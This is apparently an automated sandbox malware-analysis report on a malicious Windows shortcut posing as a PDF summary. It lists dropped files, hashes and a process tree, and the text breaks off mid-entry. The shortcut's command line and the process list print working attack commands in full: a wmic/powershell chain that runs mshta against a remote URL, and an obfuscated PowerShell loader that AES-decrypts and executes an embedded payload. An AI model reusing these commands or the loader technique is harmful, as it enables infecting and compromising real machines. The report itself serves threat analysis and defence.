                                              Encrypted:false
                                              SSDEEP:24576:YG6IbYX2xv8UtCqOxAhDFYh5wvgKvSKuj5hYFDhAxCHD8xFDBA+0zUv2C4q0VJuu:YCCqOxAhDFYh5Dj5hYFDhAxCxWbwna2F
                                              MD5:38D90065208DA1D895CC718FCDF7207F
                                              SHA1:42B7D65BCDEAFD473D52CBF25C383079BF8729D2
                                              SHA-256:D085AEC2171F071A230DE6594AC4B3252491D8C30F47087B07D00F81B31DE949
                                              SHA-512:F66E7F07F4C6DFED8952010EAC09ADF6C60991DD1DFE1CB3B0551ACE447FC36977490A6930A8DCB8CF9C747CFC1BCE990DC063A40FE9ACCBBE39AF09AF25691A
                                              Malicious:false
                                              Preview:!<arch>./ 1695742191 0 222750 `................~...~...........j...j...........@...@.........&...&.................~...~...........N...N.........$...$.................b...b...........:...:.................x...x...........J...J...............................j...j...........Z...Z...........N...N...........P...P...........\...\...........n...n.........................x...x...........t...........J...J...............................v...v...........T...T...........D...D.........&...&...........................................................h...h...........F.................................j...j...........V...V...........L...L.........4...4...........&...&...................................................................|...|...........l...l...........X...X...........D...D...........0...0...................................r...r...........\...\...........J...J...........@...@...........,...,...........(...(................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):277504
                                              Entropy (8bit):6.237513941837174
                                              Encrypted:false
                                              SSDEEP:6144:3j/sVYUspTJMU5Gjw0u864KwtaxOf9yCPx3lBIzN:bsVYnpVMYGjw6dxVQ
                                              MD5:D096BED0C306438803F40DAA22F91504
                                              SHA1:BE0B7EB82334F5250C6D71E3167B23BF51929689
                                              SHA-256:ADA21F28ED808FFA6ECC6D199D8AC3A8ADC95BF9724443CC4B99371F1666DD44
                                              SHA-512:CDEEDAA4B2F682FD0E211B0C3C266EC3E1658C5ED3DC945D96093A6FE88226F11A0B4D96A5CA8E6AD427C364FA1B12A6BB4AA7F7F0883A5D2278FAD8B2F5420F
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..R..R..[.5.\......P......P..4.[.U......\......Z......V.....Q..R..L.....F.....S...Y.S.....S..RichR..................PE..d...C..e.........." .........~...........................................................`A.........................................................`..X....0... ...........p..H...0...T.......................(.......8............................................text............................... ..`.rdata...E.......F..................@..@.data...`.... ......................@....pdata... ...0..."..................@..@.rsrc...X....`.......,..............@..@.reloc..H....p.......6..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8ts.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):9077248
                                              Entropy (8bit):6.586126818604595
                                              Encrypted:false
                                              SSDEEP:98304:E7hOE9Uen+KS14ueJmHCqR2nOTA4EMSfV/1Zl2MCFue9eCedq5N6QBAUZLD4LK:E7NJnmWveDR2OTA2r6QVX4e
                                              MD5:444C82F2BD2C8FE20AAE7654AF26E3C8
                                              SHA1:E2AD31E2230138DA62605FE2A4FDDCED8A518981
                                              SHA-256:503D6C312542680A1DA566FE793A8A7173EC0D0EE33474A164073517ECCAFB3F
                                              SHA-512:0F007B2F4FDBD0FA2EFFE6F32E168B8BB9C9270EDF06CB0ADC310396F6F1B092026090888292D2F04EA0E9D884C49355C6888A1CFDF0B652553EFEFF216331C3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=.u.y...y...y...p...o...+...{.......o...+...u...+...q...+...}...O...........P......k...y.......2...h...............q.......{.......x.......x.......x...Richy...................PE..d...-..e.........." .....VW..(3.......>......................................`...........`A..........................................x...h........0...........i...........@..D...$.n.T.....................o.(.....n.8............pW..............................text...eTW......VW................. ..`.rdata..DB...pW..D...ZW.............@..@.data... ........X..................@....pdata...i.......j..................@..@.rsrc........0.......`..............@..@.reloc..D....@.......j..............@..B................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exe

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):279552
                                              Entropy (8bit):6.235843908006801
                                              Encrypted:false
                                              SSDEEP:6144:QVMq2esj6Zv4+xEIu864KMnxOf9yCPx3lB8d:M2ena+xE+0xV2
                                              MD5:692347C90EBF1227B717A0C8A3DAE8C3
                                              SHA1:2D96EE9224FF50BC6ADBF3C2B04945151BE7CB1A
                                              SHA-256:6014457715ED97F72D4B4E372119D7D870299EB2DF1DA5EC5D7A3A61D101F9DA
                                              SHA-512:090059D7FBBB4D373BAC16995FA418DFF8CDD83DFF70C9CD959C17BFF7D0CEF9EA40431EAAC12C40EBF7AC36B0151284A110DAF11E368541D4F898144BE7C347
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1...8.k.!...c...3...z...3...W...6...c...$...c...;...c...5.......2...1...........%.......0.......0.......0...Rich1...................PE..d......e..........".................@..........@....................................nC....`..........................................................`.......0... ..............L......T.......................(...@...8............................................text...!........................... ..`.rdata...G.......H..................@..@.data...p.... ......................@....pdata... ...0..."..................@..@.rsrc........`.......,..............@..@.reloc..L............>..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\readme-redist-bins.txt

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):30888
                                              Entropy (8bit):5.300461092105552
                                              Encrypted:false
                                              SSDEEP:768:29wLJhkF4Vg4DJR6I6guWL4hF2Lq4wlHxLL3OMoL9C/QnsJrLOIWcydFkjNvzYgp:TLQX4DOIlL02Lq4wlxLLBKXncrLOQaF8
                                              MD5:D4EDD51CF7878E1AAFE799E0F5CE3B5A
                                              SHA1:4F4C5844415D89826814371A7DEF58DEDBC316AC
                                              SHA-256:878CA254C4EDBB517C614F7234C694E828E2B1519F7858FF4AA696F28B182A29
                                              SHA-512:39A8630937FB443880177636E3E8EA5FB1E4EF60013077502D278D926BCBD86A91825917213EADA38E93152C2D74E7A1E8C1243B8A4F6344609CAFCD90E1F70E
                                              Malicious:false
                                              Preview: 1. libmagic (ext/fileinfo) see ext/fileinfo/libmagic/LICENSE.. 2. libmbfl (ext/mbstring) see ext/mbstring/libmbfl/LICENSE.. 3. pcre2lib (ext/pcre).. 4. ext/standard crypt.. 5. ext/standard crypt's blowfish implementation.. 6. ext/standard/rand.. 7. ext/standard/scanf.. 8. ext/standard/strnatcmp.c.. 9. ext/standard/uuencode..10. main/snprintf.c..11. main/strlcat..12. main/strlcpy..13. libgd (ext/gd)..14. ext/phar portions of tar implementations..15. ext/phar/zip.c portion extracted from libzip..16. libbcmath (ext/bcmath) see ext/bcmath/libbcmath/LICENSE..17. ext/mbstring/ucgendat portions based on the ucgendat.c from the OpenLDAP..18. avifinfo (ext/standard/libavifinfo) see ext/standard/libavifinfo/LICENSE..19. xxHash (ext/hash/xxhash)......3. pcre2lib (ext/pcre)....PCRE2 LICENCE..-------------....PCRE2 is a library of functions to support regular expressions whose syntax..and semantics are as close as possible to those of the Perl 5 language.....Releases 10.00 and above of PCRE2 are d

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\snapshot.txt

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):2286
                                              Entropy (8bit):4.47005475174161
                                              Encrypted:false
                                              SSDEEP:24:Mvw6OL7ANOxqDvBEEsyodGmlDOfZGpiFGpomfflmicfJmfoZGmMoIB9m4B9CB99w:p6k7yacXOBiZ/dul69HrwqwMIymwMt
                                              MD5:AA066FEEBCD5370ED6B246B2814DEC7F
                                              SHA1:5E01108044D6ABAF77779A0AD13BA5FA803E6F57
                                              SHA-256:5FC601723F752A02F48211C431CCC62E345DA5EB1CFDE87E3A966169E21DBCFC
                                              SHA-512:96DE7504F50F170868B37720B48F9F49124CA66C8D8940A514D9BA91F83317D167E39D1E18F907C609409CFD28B3B43B2D14088AB41A047D174309CC91073400
                                              Malicious:false
                                              Preview:This snapshot was automatically generated on.Tue, 26 Sep 2023 16:00:52 +0000..Version: 8.2.11.Branch: HEAD.Build: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS...Built-in Extensions..===========================..Core..bcmath..calendar..ctype..date..filter..hash..iconv..json..SPL..pcre..readline..Reflection..session..standard..mysqlnd..tokenizer..zip..zlib..libxml..dom..PDO..openssl..SimpleXML..xml..xmlreader..xmlwriter..curl..ftp..sqlite3..Phar..mbstring..mysqli......Dependency information:..Module: php_curl.dll..===========================...libcrypto-3-x64.dll...libssl-3-x64.dll...libssh2.dll...nghttp2.dll....Module: libssl-3-x64.dll..===========================...libcrypto-3-x64.dll....Module: libssh2.dll..===========================...libcrypto-3-x64.dll....Module: php_enchant.dll..===========================...libenchant2.dll....Module: libenchant2.dll..===========================...glib-2.dll...gmodule-2.dll....Module: gmodule-2.dll..===========================...glib-2.dll...

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\vcruntime140.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):109440
                                              Entropy (8bit):6.642252418996898
                                              Encrypted:false
                                              SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                              MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                              SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                              SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                              SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):273408
                                              Entropy (8bit):6.148079366490214
                                              Encrypted:false
                                              SSDEEP:6144:NEcJbsK5ZcOHlIrANgOPHF6nHsohRH17nMu:TsfcIrYPoF7n
                                              MD5:F63E0C410E4CA83CDA47BA4871AEAC30
                                              SHA1:383EA6241C5E770E291A50448653C14B1090C122
                                              SHA-256:039AD045C278A28CFC1A4322AF289D7250BED30B82032201CCD5BED3874D99F4
                                              SHA-512:32654BAA8994F993AFB54A337BABE14B9302CCB04D5A0D936F9CEA234CCD04972F4C3BFA2D8D6F7BB0DB82BDA8C43A17A1868FC1EA9646B5818ECDD727D8B778
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g.}.g.}.g.}...|.g.}...|og.}z..|.g.}z..|.g.}...|.g.}.g.}.g.}z..|.g.}...|.g.}S..|.g.}S..|.g.}Rich.g.}........................PE..d...P.yg.........."............................@.............................p............`.....................................................d............ ...............`..................................(.......8............................................text...l........................... ..`.rdata...;.......<..................@..@.data...<+..........................@....pdata....... ...0..................@..@_RDATA.......P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................

                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.306461250274409
                                              Encrypted:false
                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                              Malicious:false
                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                              \Device\ConDrv

                                              Download File
                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):160
                                              Entropy (8bit):5.095703110114614
                                              Encrypted:false
                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglTBlJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egbleAin
                                              MD5:E8E5D6D0D2936B1BA66F8A8E7C6EC6B5
                                              SHA1:7E4BF87B0D3815676AE02C7FBA0D1482332AC1E9
                                              SHA-256:6834A532E0C06531268E58D2C385C1EBCAA01C9B1AD4188F57F102E4680AF2DC
                                              SHA-512:499BA1AC1C6B32BA0C53F7B98CC7311988B23997C5B249F4881A8C6786CA388C760385E7042B7425EB97219886A19E96B443572B148652627B322F84C250B866
                                              Malicious:false
                                              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7628;...ReturnValue = 0;..};....

                                              Static File Info

                                              General

                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                              Entropy (8bit):2.6180398785972723
                                              TrID:
                                              • Windows Shortcut (20020/1) 100.00%
                                              File name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
                                              File size:1'894 bytes
                                              MD5:97d7ccb68cdc1beaee32700a58e8f901
                                              SHA1:c16d12acb3de008be42cd1d5527ee5ecd51d6354
                                              SHA256:9315c00b9914f987381604b289e426dab0e6c8eefd7ccb0656c2cde5503800c7
                                              SHA512:e21da7ad127352c9fc46991daeb5841fff7fab972b12eda9c6e912e9de231d7d28ecbadef635129682e5024257d1026c473088467cb993f4957aa29920a434c1
                                              SSDEEP:24:8AyH/BUlgKN4eH+/3/kWNdk6Zocxb5qdd79dsH/G4G:89uGeA/ldkUNEdJ9eh
                                              TLSH:E64171001AED0B20F3B38D725876B715D97F788DDE734E0C004185881872620E875F9F
                                              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                              File Icon

                                              Icon Hash:929e9e96a3f3d6ed

                                              Static Windows Shortcut Info

                                              General

                                              Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                              Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                              Network Behavior

                                              No network behavior found

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:43:53
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
                                              Imagebase:0x7ff7f86e0000
                                              File size:576'000 bytes
                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:04:43:53
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:04:43:54
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:04:43:54
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:04:43:55
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:43:55
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm
                                              Imagebase:0x7ff7a8c10000
                                              File size:14'848 bytes
                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:43:57
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:04:43:59
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $PwiNROQ.Substring(6)
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:04:43:59
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:04:44:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"
                                              Imagebase:0x7ff6bc1b0000
                                              File size:5'641'176 bytes
                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:10
                                              Start time:04:44:02
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:11
                                              Start time:04:44:03
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:12
                                              Start time:04:44:03
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"
                                              Imagebase:0x7ff658e20000
                                              File size:273'408 bytes
                                              MD5 hash:F63E0C410E4CA83CDA47BA4871AEAC30
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\tar.exe
                                              Wow64 process (32bit):false
                                              Commandline:tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
                                              Imagebase:0x7ff7aa4d0000
                                              File size:54'784 bytes
                                              MD5 hash:3596DC15B6F6CBBB6EC8B143CBD57F24
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
